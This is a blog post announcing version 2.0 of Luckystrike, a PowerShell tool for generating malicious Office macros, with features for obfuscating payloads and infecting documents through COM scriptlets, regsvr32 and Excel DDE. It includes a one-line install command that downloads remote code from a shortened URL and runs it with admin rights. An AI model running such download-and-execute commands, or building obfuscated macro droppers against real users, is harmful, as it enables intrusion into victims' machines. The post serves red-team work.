Sunday, July 23, 2017

Luckystrike 2.0 is here!

tl;dr: Luckystrike is an open source evil macro generation utility written in PowerShell. Originally released at DerbyCon 6.0. Updates include Word support & new attacks.

Code is here.
Original blog post here.
Derbycon talk here (luckystrike begins at 18:45)

New Features:

  1. Full support for Microsoft Word output (.doc), as well as Word-based template storage.
  2. Support for Invoke-Obfuscation of PowerShell based payloads as well as PowerShell Shell commands (e.g. powershell -nop -enc ...)
  3. New Payload Type: COM Scriptlets. Receives a URL that points to your scriptlet and can fire it via the following Infection Types (based on amazing @subTee research):
    1. Pubprn.vbs - Example
    2. Regsrv32 - Example
  4. Excel DDE Infection Type added: Research. Note that your first Shell Command payload word is the command run by DDE.
  5. A truckload of bug fixes
  6. Luckystrike's -API switch allows it to be scriptable. See my Pester script for examples.
  7. I also filled out the wiki to make it easy to get assistance.

First-time Installation


I highly encourage you to read the wiki before installing, but if you're antsy, you can install with this PowerShell command (run in an admin context):

iex (new-object net.webclient).downloadstring('https://git.io/v7kbp')

Upgrading


Normally luckystrike will prompt you when there is a new upgrade. However, I just switched repos, so this creates a problem. Easiest is just to install new, but if you have templates/payloads that you want to preserve, you can upgrade easily by opening luckystrike.ps1 in an editor and change the old repo location to the new repo location. Once you save/close/relaunch, luckystrike will pick up the changes from the new repo and prompt you to upgrade.

Old Repo:


New Repo:



Getting Help


If you encounter an error and/or need other assistance, please run luckystrike with the -Debug switch. It will create a debug log that you must upload with your github issue, otherwise you can expect me to not respond!

I do not offer help in making payloads. Please stop asking.

Credits


Huge thanks to Casey Smith for continuing to put out awesome research, Daniel Bohannon for incredible obfuscation work, and Steve McKenzie for help testing and git-fu. <3 you guys!

2 comments:

  1. Have been eagerly awaiting Word doc capability :) , but getting COM scriptlet and Excel DDE support is terrific. And of course Invoke-Obfuscation built-in...a very nice release. Can't wait to fire it up in the lab!

    ReplyDelete
    Replies
    1. Thanks! By all means get in touch with me on twitter/github to let me how how things work out! Feedback is always appreciated.

      @curi0usJack

      Delete